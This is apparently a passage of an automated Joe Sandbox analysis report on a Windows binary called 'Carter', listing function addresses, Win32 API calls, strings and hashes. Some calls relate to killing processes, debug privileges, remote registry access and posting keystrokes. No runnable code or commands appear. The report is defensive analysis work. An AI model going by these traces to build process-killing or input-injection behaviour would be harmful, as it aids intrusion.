                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002CA263
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002CA266
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 002CA26F
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002CA28D
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002CA290
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 002CA299
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002CA2B0
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002CA2B3
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: 25946a24662530ef6b39cf524e33c7e37ce3bfb5867d7a830854a995b8509b03
                                                                            • Instruction ID: 5dc78fde8219a27b7de1da90923371de9034540e74196b76b8baba5658dbffa4
                                                                            • Opcode Fuzzy Hash: 25946a24662530ef6b39cf524e33c7e37ce3bfb5867d7a830854a995b8509b03
                                                                            • Instruction Fuzzy Hash: 7211E1B1960218BEF6116F609C8AF6A7B2DEB4C794F50051AF7446B0D0CAF35C609AA1
                                                                            Function 002C94D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002C915A,00000B00,?,?), ref: 002C94E2
                                                                            • HeapAlloc.KERNEL32(00000000,?,002C915A,00000B00,?,?), ref: 002C94E9
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002C915A,00000B00,?,?), ref: 002C94FE
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,002C915A,00000B00,?,?), ref: 002C9506
                                                                            • DuplicateHandle.KERNEL32(00000000,?,002C915A,00000B00,?,?), ref: 002C9509
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002C915A,00000B00,?,?), ref: 002C9519
                                                                            • GetCurrentProcess.KERNEL32(002C915A,00000000,?,002C915A,00000B00,?,?), ref: 002C9521
                                                                            • DuplicateHandle.KERNEL32(00000000,?,002C915A,00000B00,?,?), ref: 002C9524
                                                                            • CreateThread.KERNEL32(00000000,00000000,002C954A,00000000,00000000,00000000), ref: 002C953E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: a6a427206be89e435c66e72192ed6590d0f5bc706687fb5d23ab238eb32106f9
                                                                            • Instruction ID: a755087e56aab3abdd1c4c3bc445cd34a62dc1587bc1ba3c4ece301c1b405678
                                                                            • Opcode Fuzzy Hash: a6a427206be89e435c66e72192ed6590d0f5bc706687fb5d23ab238eb32106f9
                                                                            • Instruction Fuzzy Hash: 5D01C9B9241308BFE715AFA5DC4DF6B7BACEB89711F408412FA05DB2A1CA709800CB20
                                                                            Function 002EA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 8c314410901c47a7dddf2bbd052b58912e0efc61c0920d36c8030844987a447d
                                                                            • Instruction ID: de066d61fa71891eea6ba3a7a99d4642220e8edf5f7ef358fe36f617ae946b70
                                                                            • Opcode Fuzzy Hash: 8c314410901c47a7dddf2bbd052b58912e0efc61c0920d36c8030844987a447d
                                                                            • Instruction Fuzzy Hash: 21C1B271E5025A9FDF10CF99C884BAEB7F9FF48310F948469E905AB280E770AD54CB51
                                                                            Function 002E97FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$_memset
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 2862541840-625585964
                                                                            • Opcode ID: caed4927245c06b934d6b2ac06d736e802eb61a7f1b301d7e13913d7cb63d054
                                                                            • Instruction ID: 9683eed0215859a0eee232b422ca908187237b4a9c31bdf521c3ce9f4019ceee
                                                                            • Opcode Fuzzy Hash: caed4927245c06b934d6b2ac06d736e802eb61a7f1b301d7e13913d7cb63d054
                                                                            • Instruction Fuzzy Hash: 8391B070A6025AAFDF24CFA6C844FAEBBB8EF45710F50851EF515AB241D7709990CFA0
                                                                            Function 002F73A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002F7449
                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 002F745D
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002F7477
                                                                            • _wcscat.LIBCMT ref: 002F74D2
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 002F74E9
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002F7517
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat
                                                                            • String ID: SysListView32
                                                                            • API String ID: 307300125-78025650
                                                                            • Opcode ID: 8e379ad1fe757f6576c1cf549acbcbea72f4f56412e51e9973df14e203584543
                                                                            • Instruction ID: 5183335b9ff41dc3e2d097f6f2fbbc5287f3892b981fa3e99f5ff5e39c7887e9
                                                                            • Opcode Fuzzy Hash: 8e379ad1fe757f6576c1cf549acbcbea72f4f56412e51e9973df14e203584543
                                                                            • Instruction Fuzzy Hash: D541A37091430DAFEB229F64CC85BEEB7B9EF08390F10446AFA85A7191D6719D94CB50
                                                                            Function 002EF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002D4148: CreateToolhelp32Snapshot.KERNEL32 ref: 002D416D
                                                                              • Part of subcall function 002D4148: Process32FirstW.KERNEL32(00000000,?), ref: 002D417B
                                                                              • Part of subcall function 002D4148: CloseHandle.KERNEL32(00000000), ref: 002D4245
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002EF08D
                                                                            • GetLastError.KERNEL32 ref: 002EF0A0
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002EF0CF
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 002EF14C
                                                                            • GetLastError.KERNEL32(00000000), ref: 002EF157
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002EF18C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: 5bde5c1240aa70a9cdc0aabf18124a9b95b04e28b27330459b579a909df545c3
                                                                            • Instruction ID: 30acf6d761cbe3e928ae552d8206bcd3d4fb3debe9c9d131f1b50f59360a4ad0
                                                                            • Opcode Fuzzy Hash: 5bde5c1240aa70a9cdc0aabf18124a9b95b04e28b27330459b579a909df545c3
                                                                            • Instruction Fuzzy Hash: 0341CC312603019FDB26EF24CCA5F6DB7A4AF80314F488059F94A5F2C2DBB0A924CF95
                                                                            Function 002D47E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002D4802
                                                                            • LoadStringW.USER32(00000000), ref: 002D4809
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002D481F
                                                                            • LoadStringW.USER32(00000000), ref: 002D4826
                                                                            • _wprintf.LIBCMT ref: 002D484C
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002D486A
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 002D4847
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 3648134473-3128320259
                                                                            • Opcode ID: 9cef8b771d832a6df435242d5c2095699138253ae74d53e192ddf671c088f525
                                                                            • Instruction ID: 29334e501c6d0b56139f92d57584a651e937f9fe06ec001b72fa61008fc70a1f
                                                                            • Opcode Fuzzy Hash: 9cef8b771d832a6df435242d5c2095699138253ae74d53e192ddf671c088f525
                                                                            • Instruction Fuzzy Hash: 7D016DF690124C7FE716ABA09D89FF7736DEB08300F4005A6BB49E2141EB749E948B75
                                                                            Function 002FDB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 002FDB42
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 002FDB62
                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 002FDD9D
                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002FDDBB
                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002FDDDC
                                                                            • ShowWindow.USER32(00000003,00000000), ref: 002FDDFB
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002FDE20
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 002FDE43
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                            • String ID:
                                                                            • API String ID: 1211466189-0
                                                                            • Opcode ID: 02441ac8a6dc6c6c419e0567f17318b7bd823198affc24ae3a22f77f5f5b615b
                                                                            • Instruction ID: a01308157711339629d8d249e39b9da131c889c16c833c7d22a577d43d3979f3
                                                                            • Opcode Fuzzy Hash: 02441ac8a6dc6c6c419e0567f17318b7bd823198affc24ae3a22f77f5f5b615b
                                                                            • Instruction Fuzzy Hash: B7B19B3160021AEBDF14CF69C9D57BDBBB2BF04741F08817AEE489E255D771A960CB90
                                                                            Function 002F0371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002F040D,?,?), ref: 002F1491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002F044E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharConnectRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3479070676-0
                                                                            • Opcode ID: 423581285d22bbe2166354c2e220847b3d1cf8a0aeaccb991948219009c57b95
                                                                            • Instruction ID: bd90fb819d7d07ff05f8134cff00dca7271db46d1afce69130188a3c3ded5912
                                                                            • Opcode Fuzzy Hash: 423581285d22bbe2166354c2e220847b3d1cf8a0aeaccb991948219009c57b95
                                                                            • Instruction Fuzzy Hash: 2CA17A302242059FCB11EF14C891F3EB7E9AF84354F14892DFA9A87292DB71E965CF42
                                                                            Function 00272E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,002AC508,00000004,00000000,00000000,00000000), ref: 00272E9F
                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,002AC508,00000004,00000000,00000000,00000000,000000FF), ref: 00272EE7
                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,002AC508,00000004,00000000,00000000,00000000), ref: 002AC55B
                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,002AC508,00000004,00000000,00000000,00000000), ref: 002AC5C7
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: 6379e87f95b0538b9dd4586ab98d6c6147094e7a41fc4d497aeaf2673dcdf23a
                                                                            • Instruction ID: 163e9a764aa0926a2cddfb595caace69ed1fe5bafe1fd748b5095da6718a2c5c
                                                                            • Opcode Fuzzy Hash: 6379e87f95b0538b9dd4586ab98d6c6147094e7a41fc4d497aeaf2673dcdf23a
                                                                            • Instruction Fuzzy Hash: F3410C30A34685DBD73A8F2CCC88B6A7BD6AB86300F64C41DF48B56560CB71B868DB11
                                                                            Function 002D7681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 002D7698
                                                                              • Part of subcall function 00290FE6: std::exception::exception.LIBCMT ref: 0029101C
                                                                              • Part of subcall function 00290FE6: __CxxThrowException@8.LIBCMT ref: 00291031
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002D76CF
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 002D76EB
                                                                            • _memmove.LIBCMT ref: 002D7739
                                                                            • _memmove.LIBCMT ref: 002D7756
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 002D7765
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002D777A
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 002D7799
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 256516436-0
                                                                            • Opcode ID: 44e28336ede7d2ceff2b242b38d7f58c9c083a18fbd410ef901c435e96065bc8
                                                                            • Instruction ID: 1cf3b14879cc43c5e37003774519ddc25b889c43c0785d2c7b3cdff4dbc89dd7
                                                                            • Opcode Fuzzy Hash: 44e28336ede7d2ceff2b242b38d7f58c9c083a18fbd410ef901c435e96065bc8
                                                                            • Instruction Fuzzy Hash: D1319E31914209EBDF11EF65DC85EAEB77CEF45700F1440A6FD04AA246DB309E20CBA0
                                                                            Function 002F67F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 002F6810
                                                                            • GetDC.USER32(00000000), ref: 002F6818
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002F6823
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 002F682F
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002F686B
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002F687C
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002F964F,?,?,000000FF,00000000,?,000000FF,?), ref: 002F68B6
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002F68D6
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 99176ac379c20079ff62097515107ecf16b68028885da7f63b2edac9c9c958a9
                                                                            • Instruction ID: 7d732dc2cbf82bd7c96f8a8f95c26fdc4221d29f0ca188fd89537e3fefe32497
                                                                            • Opcode Fuzzy Hash: 99176ac379c20079ff62097515107ecf16b68028885da7f63b2edac9c9c958a9
                                                                            • Instruction Fuzzy Hash: 08316D72111214BFEB158F10CC9AFEA3BADEF497A1F044065FE089A291C6759851CBB0
                                                                            Function 002CC748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: f1c0c87cdc115253aa5105cb494fb569944ff77edb60c80e28a85b3a162fd1ed
                                                                            • Instruction ID: 351d5a9928dae8fea59d6ee27008b98c2b70d2e6f1c0ca72667d574c5d97e21b
                                                                            • Opcode Fuzzy Hash: f1c0c87cdc115253aa5105cb494fb569944ff77edb60c80e28a85b3a162fd1ed
                                                                            • Instruction Fuzzy Hash: 96210A73A751077AE606B9114D52FBB775CDE10744F28022CFD0EA6282E750DE35CAA1
                                                                            Function 002DF166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                              • Part of subcall function 0028436A: _wcscpy.LIBCMT ref: 0028438D
                                                                            • _wcstok.LIBCMT ref: 002DF2D7
                                                                            • _wcscpy.LIBCMT ref: 002DF366
                                                                            • _memset.LIBCMT ref: 002DF399
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                            • String ID: X
                                                                            • API String ID: 774024439-3081909835
                                                                            • Opcode ID: fc4702a92e109793b1c3f10404e43366d9f11b088fccb15e20858993a9910201
                                                                            • Instruction ID: ca942d20edf679f42154f22148641cd474f23babb8932fccdd3ce0f632f2f0ff
                                                                            • Opcode Fuzzy Hash: fc4702a92e109793b1c3f10404e43366d9f11b088fccb15e20858993a9910201
                                                                            • Instruction Fuzzy Hash: 1BC19D755243419FC754EF24D981A6BB7E8AF84314F00492EF89A873A2DB70EC65CF82
